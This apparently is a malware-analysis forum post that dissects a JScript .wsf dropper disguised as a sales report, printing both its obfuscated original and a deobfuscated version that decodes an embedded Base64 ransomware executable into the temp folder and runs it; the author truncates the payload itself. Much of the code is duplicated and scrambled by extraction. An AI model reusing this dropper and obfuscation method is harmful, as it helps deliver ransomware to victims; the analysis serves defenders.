- May 14, 2016
- 1,597
http://malwaretips.com/threads/22-7-16-6-samples.61625/
sales report 5170.wsf
12/55
https://www.virustotal.com/en/file/...c38a4a74e12136a9ed7bd8a16156626865e/analysis/
Exe file dropped :
syf4J4dMPJO14jlw.exe
10/54
https://www.virustotal.com/en/file/c3b420406e887b6e41425ef5bdb2214a9da95ff9d8fc1395faaee131e7bf7a4e/analysis/
I have chosen this sample, because :
- I think that it is the worst obfuscation method I have seen this last months![Eek! :eek: :eek:](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
- it's a dropper, but the exe data (ransomware) isn't very obfuscated in the sales report 5170.wsf
Just compare with my precedent analysis (an obfuscated JS downloading a VERY obfuscated ransomware and modifying it to create a runnable exe)
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
Script used : Jscript
Main part :
try {
catch (e) {};
(1) The ransomware is hard coded in the wsf file, in a var as a Base64 encoded String :
var v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA................................=";
I show only a small part for security purpose (and because there is a lot of chars
)
(2) Path are constructed :
var Shell = WScript.CreateObject("WScript.Shell");
var Path = Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"
var exe_Path= Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"
var bin_Path= exe_Path+ ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"
(3) One function is used to copy this string to a file with .bin extension :
function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
(4) Another function is used to read the .bin file, decode the content and write it to an exe file :
function from_bin_File_to_exe_File(bin_Path, exe_Path) {
(4) Then the exe file is run :
Shell.Run( exe_Path + " 321");
=> need a parameter (like in my precedent post)
(5) Conclusion :
- Very easy to deobfuscate this sample, the creator was certainly too tired to obfuscate it better![Roll eyes :rolleyes: :rolleyes:](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
- Base64 decoder method is interesting (using a node of a temporary xml object in memory)
- It is also very easy to obtain quickly the exe file (copy and paste the Base64 encoded string on a tool (notepad++), Base64 decode, save the result on a file with .exe extension ... ), to send it to virus total, for example, but as it need a parameter, we won't obtain a realistic dynamical analysis this way![Stick out tongue :p :p](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
https://www.hybrid-analysis.com/sam...f9d8fc1395faaee131e7bf7a4e?environmentId=100/
=> it's better to submit the .wsf file![Smile :) :)](data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7)
sales report 5170.wsf
12/55
https://www.virustotal.com/en/file/...c38a4a74e12136a9ed7bd8a16156626865e/analysis/
Exe file dropped :
syf4J4dMPJO14jlw.exe
10/54
https://www.virustotal.com/en/file/c3b420406e887b6e41425ef5bdb2214a9da95ff9d8fc1395faaee131e7bf7a4e/analysis/
I have chosen this sample, because :
- I think that it is the worst obfuscation method I have seen this last months
- it's a dropper, but the exe data (ransomware) isn't very obfuscated in the sales report 5170.wsf
Just compare with my precedent analysis (an obfuscated JS downloading a VERY obfuscated ransomware and modifying it to create a runnable exe)
https://malwaretips.com/threads/new...y-mail-js-trojandownloader-nemucod-ajp.61375/
Script used : Jscript
Main part :
try {
from_var_to_bin_File(v_bin_B64Encoded, bin_Path);
from_bin_File_to_exe_File(bin_path, exe_Path);
Shell.Run( exe_Path + " 321");
}from_bin_File_to_exe_File(bin_path, exe_Path);
Shell.Run( exe_Path + " 321");
catch (e) {};
(1) The ransomware is hard coded in the wsf file, in a var as a Base64 encoded String :
var v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA................................=";
I show only a small part for security purpose (and because there is a lot of chars
(2) Path are constructed :
var Shell = WScript.CreateObject("WScript.Shell");
var Path = Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"
var exe_Path= Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"
var bin_Path= exe_Path+ ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"
(3) One function is used to copy this string to a file with .bin extension :
function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
object_FileSystem = new ActiveXObject("Scripting.FileSystemObject");
file = object_FileSystem.OpenTextfile(bin_Path, 2, true);
// 2: Opens the file using the system default
//true: create file if it doesn't exist
file.write(v_bin_64Encoded);
file.Close();
// here "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin" is created
file = object_FileSystem.OpenTextfile(bin_Path, 1);
//1: Open a file for reading only.
return file.ReadLine(); // return value never used
}file = object_FileSystem.OpenTextfile(bin_Path, 2, true);
// 2: Opens the file using the system default
//true: create file if it doesn't exist
file.write(v_bin_64Encoded);
file.Close();
// here "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin" is created
file = object_FileSystem.OpenTextfile(bin_Path, 1);
//1: Open a file for reading only.
return file.ReadLine(); // return value never used
(4) Another function is used to read the .bin file, decode the content and write it to an exe file :
function from_bin_File_to_exe_File(bin_Path, exe_Path) {
var object_FileSystem = WScript.CreateObject("Scripting.FileSystemObject");
//Provides access to a computer's file system
var Object_File = object_FileSystem.GetFile(bin_Path);
//Returns a File object corresponding to the file in a specified path
var file_TextSteam = Object_File.OpenAsTextStream(1, 0);
//TextStream linked to the file opened
var xmlDoc = WScript.CreateObject("MSXml2.DOMDocument");
// xml document
var objNode = xmlDoc.CreateElement("Base64Data");
// Element
objNode.datatype = "bin.base64";
// Element datatype
objNode.text = file_TextSteam.ReadAll();
// Base64 encoded String
var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
object_ADODBStream.Type = 1; //binary
object_ADODBStream.Open();
object_ADODBStream.Write(objNode.nodeTypedValue);
// Base64 decoded String wrote to the Stream as binary !
object_ADODBStream.SaveTofile(exe_Path, 2);
// exe file created with real content
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe""
file_TextSteam.Close();
object_ADODBStream.Close();
}//Provides access to a computer's file system
var Object_File = object_FileSystem.GetFile(bin_Path);
//Returns a File object corresponding to the file in a specified path
var file_TextSteam = Object_File.OpenAsTextStream(1, 0);
//TextStream linked to the file opened
var xmlDoc = WScript.CreateObject("MSXml2.DOMDocument");
// xml document
var objNode = xmlDoc.CreateElement("Base64Data");
// Element
objNode.datatype = "bin.base64";
// Element datatype
objNode.text = file_TextSteam.ReadAll();
// Base64 encoded String
var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
object_ADODBStream.Type = 1; //binary
object_ADODBStream.Open();
object_ADODBStream.Write(objNode.nodeTypedValue);
// Base64 decoded String wrote to the Stream as binary !
object_ADODBStream.SaveTofile(exe_Path, 2);
// exe file created with real content
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe""
file_TextSteam.Close();
object_ADODBStream.Close();
(4) Then the exe file is run :
Shell.Run( exe_Path + " 321");
=> need a parameter (like in my precedent post)
(5) Conclusion :
- Very easy to deobfuscate this sample, the creator was certainly too tired to obfuscate it better
- Base64 decoder method is interesting (using a node of a temporary xml object in memory)
- It is also very easy to obtain quickly the exe file (copy and paste the Base64 encoded string on a tool (notepad++), Base64 decode, save the result on a file with .exe extension ... ), to send it to virus total, for example, but as it need a parameter, we won't obtain a realistic dynamical analysis this way
https://www.hybrid-analysis.com/sam...f9d8fc1395faaee131e7bf7a4e?environmentId=100/
=> it's better to submit the .wsf file
<job>
<script language="Jscript">
function GTd(Km1){return Km1;};var EPm8 = "1" + "";
var KPz = " 32" + "";
function Uz(JLc){return JLc;};var Ot1 = "Run" + "";
var Bn = "in" + "";
var EUk = ".b" + "";
var UXg = "xe" + "";
var MCt = ".e" + "";
function SXa(DFf){return DFf;};var Ab6 = "jlw" + "";
var VCt = "O14" + "";
var Bx = "PJ" + "";
var KRn4 = "4dM" + "";
var ZZo4 = "4J" + "";
var NAe = "syf" + "";
var KOx = "%/" + "";
var Pc1 = "EMP" + "";
var DUw = "%T" + "";
var Hx = "hell" + "";
var SDs = "pt.S" + "";
var Vm = "cri" + "";
var Ry = "WS" + "";
var HKt = "bject" + "";
var Vw9 = "teO" + "";
var JVg = "Crea" + "";
function Mp0(WNv1){return WNv1;};var Dn6 = "ine" + "";
var QZs3 = "adL" + "";
var VNa = "Re" + "";
var BPv = "ile" + "";
var WXa5 = "tF" + "";
var Uh = "nTex" + "";
var XUq = "Ope" + "";
var Ed5 = "Close" + "";
var LQw1 = "te" + "";
var Ln9 = "Wri" + "";
function EUk4(Xr4){return Xr4;};
function Ow(WWs){return WWs;};
function JOl(NVs4){return NVs4;};
function OPo(Oe8){return Oe8;};
var ABj = "le" + "";
var UXt = "Fi" + "";
var KPt5 = "Text" + "";
var IBm = "en" + "";
var Ci0 = "Op" + "";
var Xq8 = "t" + "";
var Mf7 = "Objec" + "";
var Ro = "tem" + "";
var Li = "ys" + "";
var DVr7 = "FileS" + "";
var PTw4 = "ng." + "";
var Hc = "ripti" + "";
var Aa0 = "Sc" + "";
var Ce0 = "se" + "";
var NBi2 = "Clo" + "";
function Be6(KAc){return KAc;};var Wi7 = "e" + "";
var Ae1 = "os" + "";
var Cs = "Cl" + "";
var Rp = "File" + "";
var DPx = "veTo" + "";
var My = "Sa" + "";
var RTe4 = "lue" + "";
var XYu0 = "pedVa" + "";
var Lw = "Ty" + "";
var Kv0 = "de" + "";
var ELo7 = "no" + "";
function Oq7(Mq){return Mq;};var REp = "ite" + "";
var Rk = "Wr" + "";
var MDl = "n" + "";
var Az6 = "Ope" + "";
var Sk = "Type" + "";
function OXr9(LHs){return LHs;};var Lr = "am" + "";
var HFx = ".Stre" + "";
var Rw0 = "ODB" + "";
var Ep = "AD" + "";
var Gf4 = "ct" + "";
var Xx4 = "je" + "";
var JZm = "eOb" + "";
var Bd0 = "eat" + "";
var IZg7 = "Cr" + "";
var Kv = "ll" + "";
var QSa = "ReadA" + "";
var Vk1 = "text" + "";
var QVk1 = "4" + "";
var FZn = "ase6" + "";
var Yc = "n.b" + "";
var Jx3 = "bi" + "";
function Pe(No5){return No5;};var PXd1 = "e" + "";
var Kz0 = "yp" + "";
var Tw = "aT" + "";
var DSw0 = "dat" + "";
var Sb1 = "a" + "";
var Fj7 = "64Dat" + "";
var YZc7 = "Base" + "";
var Yb9 = "ement" + "";
var Vc1 = "ateEl" + "";
var WLg = "cre" + "";
function Ta(Cl7){return Cl7;};var BBg = "nt" + "";
var Tb7 = "ume" + "";
var KIv7 = "Doc" + "";
var NMj = "OM" + "";
var ISc = "ml2.D" + "";
var Rz6 = "MSX" + "";
var Aa = "ject" + "";
var WWa9 = "Ob" + "";
var KMn = "eate" + "";
var Fp9 = "Cr" + "";
var PJc = "m" + "";
var Us4 = "Strea" + "";
var Qq = "ext" + "";
var AWo = "AsT" + "";
var Sv = "Open" + "";
var CSq = "e" + "";
var FSp8 = "Fil" + "";
var NTy = "Get" + "";
function Zr8(Kc1){return Kc1;};function PXq(Hk){return Hk;};var EYw = "ct" + "";
var Sk9 = "je" + "";
var VSa3 = "Ob" + "";
var Yb = "ystem" + "";
var Uw = "FileS" + "";
var TTn = "ting." + "";
var Sg = "ip" + "";
var Il = "Scr" + "";
function Yf(Pa8){return Pa8;};var Sh = "ect" + "";
var TSg = "teObj" + "";
var HXt5 = "Crea" + "";
var v_bin = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";
// exe file content hidden in a Base64 Encoded string
var Tv0 = 1
var Aw = 0
var UMt = (1 * 2)
var IXf3 = 1
function EOk(HKp0, Bs) {
function TYs(CWy, Bs)
{
var KWx=WScript[HXt5 + TSg + Sh](Ry + Vm + SDs + Hx);
var Zp=KWx.ExpandEnvironmentStrings(DUw + (function Bm(){return Pc1;}()) + KOx);
var OOq=Zp + NAe + (function Zb(){return ZZo4;}()) + KRn4 + Bx + SXa(VCt) + Ab6;
var JOv7=OOq + MCt + UXg;
var v_binpath=JOv7+EUk+Bn;
try {
catch (e) {};
</script>
</job>
<script language="Jscript">
function GTd(Km1){return Km1;};var EPm8 = "1" + "";
var KPz = " 32" + "";
function Uz(JLc){return JLc;};var Ot1 = "Run" + "";
var Bn = "in" + "";
var EUk = ".b" + "";
var UXg = "xe" + "";
var MCt = ".e" + "";
function SXa(DFf){return DFf;};var Ab6 = "jlw" + "";
var VCt = "O14" + "";
var Bx = "PJ" + "";
var KRn4 = "4dM" + "";
var ZZo4 = "4J" + "";
var NAe = "syf" + "";
var KOx = "%/" + "";
var Pc1 = "EMP" + "";
var DUw = "%T" + "";
var Hx = "hell" + "";
var SDs = "pt.S" + "";
var Vm = "cri" + "";
var Ry = "WS" + "";
var HKt = "bject" + "";
var Vw9 = "teO" + "";
var JVg = "Crea" + "";
function Mp0(WNv1){return WNv1;};var Dn6 = "ine" + "";
var QZs3 = "adL" + "";
var VNa = "Re" + "";
var BPv = "ile" + "";
var WXa5 = "tF" + "";
var Uh = "nTex" + "";
var XUq = "Ope" + "";
var Ed5 = "Close" + "";
var LQw1 = "te" + "";
var Ln9 = "Wri" + "";
function EUk4(Xr4){return Xr4;};
function Ow(WWs){return WWs;};
function JOl(NVs4){return NVs4;};
function OPo(Oe8){return Oe8;};
var ABj = "le" + "";
var UXt = "Fi" + "";
var KPt5 = "Text" + "";
var IBm = "en" + "";
var Ci0 = "Op" + "";
var Xq8 = "t" + "";
var Mf7 = "Objec" + "";
var Ro = "tem" + "";
var Li = "ys" + "";
var DVr7 = "FileS" + "";
var PTw4 = "ng." + "";
var Hc = "ripti" + "";
var Aa0 = "Sc" + "";
var Ce0 = "se" + "";
var NBi2 = "Clo" + "";
function Be6(KAc){return KAc;};var Wi7 = "e" + "";
var Ae1 = "os" + "";
var Cs = "Cl" + "";
var Rp = "File" + "";
var DPx = "veTo" + "";
var My = "Sa" + "";
var RTe4 = "lue" + "";
var XYu0 = "pedVa" + "";
var Lw = "Ty" + "";
var Kv0 = "de" + "";
var ELo7 = "no" + "";
function Oq7(Mq){return Mq;};var REp = "ite" + "";
var Rk = "Wr" + "";
var MDl = "n" + "";
var Az6 = "Ope" + "";
var Sk = "Type" + "";
function OXr9(LHs){return LHs;};var Lr = "am" + "";
var HFx = ".Stre" + "";
var Rw0 = "ODB" + "";
var Ep = "AD" + "";
var Gf4 = "ct" + "";
var Xx4 = "je" + "";
var JZm = "eOb" + "";
var Bd0 = "eat" + "";
var IZg7 = "Cr" + "";
var Kv = "ll" + "";
var QSa = "ReadA" + "";
var Vk1 = "text" + "";
var QVk1 = "4" + "";
var FZn = "ase6" + "";
var Yc = "n.b" + "";
var Jx3 = "bi" + "";
function Pe(No5){return No5;};var PXd1 = "e" + "";
var Kz0 = "yp" + "";
var Tw = "aT" + "";
var DSw0 = "dat" + "";
var Sb1 = "a" + "";
var Fj7 = "64Dat" + "";
var YZc7 = "Base" + "";
var Yb9 = "ement" + "";
var Vc1 = "ateEl" + "";
var WLg = "cre" + "";
function Ta(Cl7){return Cl7;};var BBg = "nt" + "";
var Tb7 = "ume" + "";
var KIv7 = "Doc" + "";
var NMj = "OM" + "";
var ISc = "ml2.D" + "";
var Rz6 = "MSX" + "";
var Aa = "ject" + "";
var WWa9 = "Ob" + "";
var KMn = "eate" + "";
var Fp9 = "Cr" + "";
var PJc = "m" + "";
var Us4 = "Strea" + "";
var Qq = "ext" + "";
var AWo = "AsT" + "";
var Sv = "Open" + "";
var CSq = "e" + "";
var FSp8 = "Fil" + "";
var NTy = "Get" + "";
function Zr8(Kc1){return Kc1;};function PXq(Hk){return Hk;};var EYw = "ct" + "";
var Sk9 = "je" + "";
var VSa3 = "Ob" + "";
var Yb = "ystem" + "";
var Uw = "FileS" + "";
var TTn = "ting." + "";
var Sg = "ip" + "";
var Il = "Scr" + "";
function Yf(Pa8){return Pa8;};var Sh = "ect" + "";
var TSg = "teObj" + "";
var HXt5 = "Crea" + "";
var v_bin = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";
// exe file content hidden in a Base64 Encoded string
var Tv0 = 1
var Aw = 0
var UMt = (1 * 2)
var IXf3 = 1
function EOk(HKp0, Bs) {
var Mp = WScript[HXt5 + (function Wg2(){return TSg;}()) + Yf(Sh)](Il + Sg + TTn + Zr8(Uw) + Yb + VSa3 + Sk9 + (function Rv(){return EYw;}()));
var Tr = Mp[NTy + FSp8 + CSq](HKp0);
var Wr /* G */ = Tr[Sv + AWo + Qq + Us4 + PJc](Tv0, Aw);
var QWa = WScript[HXt5 + TSg + Sh](Rz6 + ISc + Ta(NMj) + KIv7 + Tb7 + (function IAg0(){return BBg;}()));
var Ll8 = QWa[WLg + Vc1 + Yb9](YZc7 + Fj7 + Sb1);
Ll8[Pe(DSw0) + (function VUj(){return Tw;}()) + Kz0 + PXd1] = "bin.base64";
Ll8[Vk1] = Wr[QSa + Kv]();
var Xv1 = WScript[HXt5 + TSg + Sh]((function STl8(){return Ep;}()) + Rw0 + OXr9(HFx) + Lr);
Xv1[Sk] = IXf3;
Xv1[Az6 + MDl]();
Xv1[Rk + REp](Ll8[ELo7 + Kv0 + Lw + (function AFx9(){return XYu0;}()) + RTe4]);
Xv1[My + DPx + Rp](Bs, UMt);
Wr[Cs + Ae1 + Wi7]();
Xv1[(function Qw0(){return Cs;}()) + Ae1 + (function AIy(){return Wi7;}())]();
}var Tr = Mp[NTy + FSp8 + CSq](HKp0);
var Wr /* G */ = Tr[Sv + AWo + Qq + Us4 + PJc](Tv0, Aw);
var QWa = WScript[HXt5 + TSg + Sh](Rz6 + ISc + Ta(NMj) + KIv7 + Tb7 + (function IAg0(){return BBg;}()));
var Ll8 = QWa[WLg + Vc1 + Yb9](YZc7 + Fj7 + Sb1);
Ll8[Pe(DSw0) + (function VUj(){return Tw;}()) + Kz0 + PXd1] = "bin.base64";
Ll8[Vk1] = Wr[QSa + Kv]();
var Xv1 = WScript[HXt5 + TSg + Sh]((function STl8(){return Ep;}()) + Rw0 + OXr9(HFx) + Lr);
Xv1[Sk] = IXf3;
Xv1[Az6 + MDl]();
Xv1[Rk + REp](Ll8[ELo7 + Kv0 + Lw + (function AFx9(){return XYu0;}()) + RTe4]);
Xv1[My + DPx + Rp](Bs, UMt);
Wr[Cs + Ae1 + Wi7]();
Xv1[(function Qw0(){return Cs;}()) + Ae1 + (function AIy(){return Wi7;}())]();
function TYs(CWy, Bs)
{
var EPy4, GXy, Zg
var YZl = 1, XQs = 2;
EPy4 = new ActiveXObject(Il + Sg + TTn + (function Wn3(){return Uw;}()) + Yb + PXq(VSa3) + Sk9 + EYw)
GXy = EPy4[EUk4(Ci0) + IBm + KPt5 + UXt + ABj](Bs, XQs, true)
GXy[Rk + Oq7(REp)](CWy);
GXy[Cs + Be6(Ae1) + Wi7]();
GXy = EPy4[Ow(Ci0) + JOl(IBm) + KPt5 + OPo(UXt) + ABj](Bs, YZl);
Zg = GXy[VNa + Mp0(QZs3) + Dn6]();
return(Zg);
}var YZl = 1, XQs = 2;
EPy4 = new ActiveXObject(Il + Sg + TTn + (function Wn3(){return Uw;}()) + Yb + PXq(VSa3) + Sk9 + EYw)
GXy = EPy4[EUk4(Ci0) + IBm + KPt5 + UXt + ABj](Bs, XQs, true)
GXy[Rk + Oq7(REp)](CWy);
GXy[Cs + Be6(Ae1) + Wi7]();
GXy = EPy4[Ow(Ci0) + JOl(IBm) + KPt5 + OPo(UXt) + ABj](Bs, YZl);
Zg = GXy[VNa + Mp0(QZs3) + Dn6]();
return(Zg);
var KWx=WScript[HXt5 + TSg + Sh](Ry + Vm + SDs + Hx);
var Zp=KWx.ExpandEnvironmentStrings(DUw + (function Bm(){return Pc1;}()) + KOx);
var OOq=Zp + NAe + (function Zb(){return ZZo4;}()) + KRn4 + Bx + SXa(VCt) + Ab6;
var JOv7=OOq + MCt + UXg;
var v_binpath=JOv7+EUk+Bn;
try {
TYs(v_bin, v_binpath);
EOk(v_binpath, JOv7);
KWx[Uz(Ot1)](JOv7 + GTd(KPz) + EPm8);
}EOk(v_binpath, JOv7);
KWx[Uz(Ot1)](JOv7 + GTd(KPz) + EPm8);
catch (e) {};
</script>
</job>
<job>
<script language="Jscript">
v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";
// ransomware Base64 encoded (i cut a big part)
var Shell = WScript.CreateObject("WScript.Shell");
var Path = Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"
var exe_Path= Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"
var bin_Path=exe_Path+ ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"
try {
catch (e) {};
function from_bin_File_to_exe_File(bin_Path, exe_Path) {
}
function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
</script>
</job>
<script language="Jscript">
v_bin_64Encoded = "TVqQAAMAAAAEAAAA//8AAAAAAA....=";
// ransomware Base64 encoded (i cut a big part)
var Shell = WScript.CreateObject("WScript.Shell");
var Path = Shell.ExpandEnvironmentStrings("%TEMP%/");
// "C:\Users\DardiM\AppData\Local\Temp/"
var exe_Path= Path + "syf4J4dMPJO14jlw.exe";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe"
var bin_Path=exe_Path+ ".bin";
// "C:\Users\DardiM\AppData\Local\Temp\syf4J4dMPJO14jlw.exe.bin"
try {
from_var_to_bin_File(v_bin_B64Encoded, bin_Path);
from_bin_File_to_exe_File(v_binpath, exe_Path);
Shell.Run( exe_Path + " 321");
}from_bin_File_to_exe_File(v_binpath, exe_Path);
Shell.Run( exe_Path + " 321");
catch (e) {};
function from_bin_File_to_exe_File(bin_Path, exe_Path) {
var object_FileSystem = WScript.CreateObject("Scripting.FileSystemObject");
//Provides access to a computer's file system
var Object_File = object_FileSystem.GetFile(bin_Path);
//Returns a File object corresponding to the file in a specified path
var file_TextSteam = Object_File.OpenAsTextStream(1, 0);
//TextStream linked to the file opened
var xmlDoc = WScript.CreateObject("MSXml2.DOMDocument");
// xml document
var objNode = xmlDoc.CreateElement("Base64Data");
// Element
objNode.datatype = "bin.base64";
objNode.text = file_TextSteam.ReadAll();
// all the Base64 encoded String
var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
object_ADODBStream.Type = 1; // binary
object_ADODBStream.Open();
object_ADODBStream.Write(objNode.nodeTypedValue);
//Write to the Stream Base64 decoded data
object_ADODBStream.SaveTofile(exe_Path, 2);
//Save the exe file wih decoded content
file_TextSteam.Close();
object_ADODBStream.Close();
//Provides access to a computer's file system
var Object_File = object_FileSystem.GetFile(bin_Path);
//Returns a File object corresponding to the file in a specified path
var file_TextSteam = Object_File.OpenAsTextStream(1, 0);
//TextStream linked to the file opened
var xmlDoc = WScript.CreateObject("MSXml2.DOMDocument");
// xml document
var objNode = xmlDoc.CreateElement("Base64Data");
// Element
objNode.datatype = "bin.base64";
objNode.text = file_TextSteam.ReadAll();
// all the Base64 encoded String
var object_ADODBStream = WScript.CreateObject("ADODB.Stream");
object_ADODBStream.Type = 1; // binary
object_ADODBStream.Open();
object_ADODBStream.Write(objNode.nodeTypedValue);
//Write to the Stream Base64 decoded data
object_ADODBStream.SaveTofile(exe_Path, 2);
//Save the exe file wih decoded content
file_TextSteam.Close();
object_ADODBStream.Close();
}
function from_var_to_bin_File(v_bin_64Encoded, bin_Path)
{
object_FileSystem = new ActiveXObject("Scripting.FileSystemObject");
file = object_FileSystem.OpenTextfile(bin_Path, 2, true)
// 2: Opens the file using the system default
// true: create file if doesn't exist
file.write(v_bin_64Encoded);
file.Close();
file = object_FileSystem.OpenTextfile(bin_Path, 1);
// 1: Open a file for reading only.
return file.ReadLine();
}file = object_FileSystem.OpenTextfile(bin_Path, 2, true)
// 2: Opens the file using the system default
// true: create file if doesn't exist
file.write(v_bin_64Encoded);
file.Close();
file = object_FileSystem.OpenTextfile(bin_Path, 1);
// 1: Open a file for reading only.
return file.ReadLine();
</script>
</job>
Last edited: